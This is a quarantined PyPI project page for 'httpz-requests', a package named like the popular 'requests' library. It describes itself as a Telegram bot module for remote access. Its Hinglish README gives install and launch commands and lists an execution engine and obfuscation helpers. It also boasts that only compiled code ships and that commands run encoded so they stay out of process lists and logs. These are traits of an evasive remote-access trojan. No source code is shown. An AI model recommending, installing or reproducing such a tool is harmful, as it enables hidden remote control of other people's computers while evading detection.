Quarantined
This project has been quarantined by PyPI admins. It cannot be installed or modified until a security review is complete.
Httpz Requests
Telegram bot module for remote access — httpz_requests.
- Import name:
httpz_requests(Python mein:from httpz_requests import start_bot) - PyPI distribution name:
httpz-requests - CLI command:
httpz-requests --token ... --owner ...
📦 Install
pip install httpz-requests
Ya project se hi:
cd ~/telegram_bot_module
pip install -e .
🚀 Bot chalao
Python script se:
from httpz_requests import start_bot
TOKEN = "YOUR_BOT_TOKEN"
OWNERS = [123456789] # Apna Telegram user ID integer mein daalo
start_bot(TOKEN, OWNERS)
Ya terminal se seedha (CLI):
httpz-requests --token YOUR_BOT_TOKEN --owner 123456789
🔒 Security
- Sirf
OWNERSlist mein diye Telegram user IDs hi access rakh sakte hain. - Published build Cython se compiled hota hai — plaintext source ship nahi hota.
- Commands encoded hokar execute hoti hain — plaintext process list/logs mein nahi dikhti.
📁 Project structure
├── src/httpz_requests/
│ ├── __init__.py (module exports)
│ ├── bot.py (Telegram handler register)
│ ├── handlers.py (command handlers)
│ ├── core.py (execution engine)
│ ├── constants.py (aliases + help)
│ ├── obfuscate.py (encode/decode helpers)
│ └── cli.py (terminal CLI)
├── pyproject.toml (packaging)
├── build_cython.py (Cython compiled build)
└── README.md
Download files
Download the file for your platform. If you're not sure which to choose, learn more about installing packages.
Source Distributions
No source distribution files available for this release.See tutorial on generating distribution archives.
Built Distribution
Filter files by name, interpreter, ABI, and platform.
If you're not sure about the file name format, learn more about wheel file names.
Copy a direct link to the current filters
File details
Details for the file httpz_requests-1.15.0-py3-none-any.whl.
File metadata
- Download URL: httpz_requests-1.15.0-py3-none-any.whl
- Upload date:
- Size: 1.9 MB
- Tags: Python 3
- Uploaded using Trusted Publishing? No
- Uploaded via:
twine/7.0.0 CPython/3.12.3
File hashes
| Algorithm | Hash digest | |
|---|---|---|
| SHA256 |
396b640a7cad3079d0e328219e9f204d73fa1e70c90f0c2adc922da54e35600a
|
|
| MD5 |
a1822dde5e73d4d3afb7911a27311605
|
|
| BLAKE2b-256 |
3afaf1ecc5dddc8cf484ce4c336455a642132df6c2178c1b47011ad84652d956
|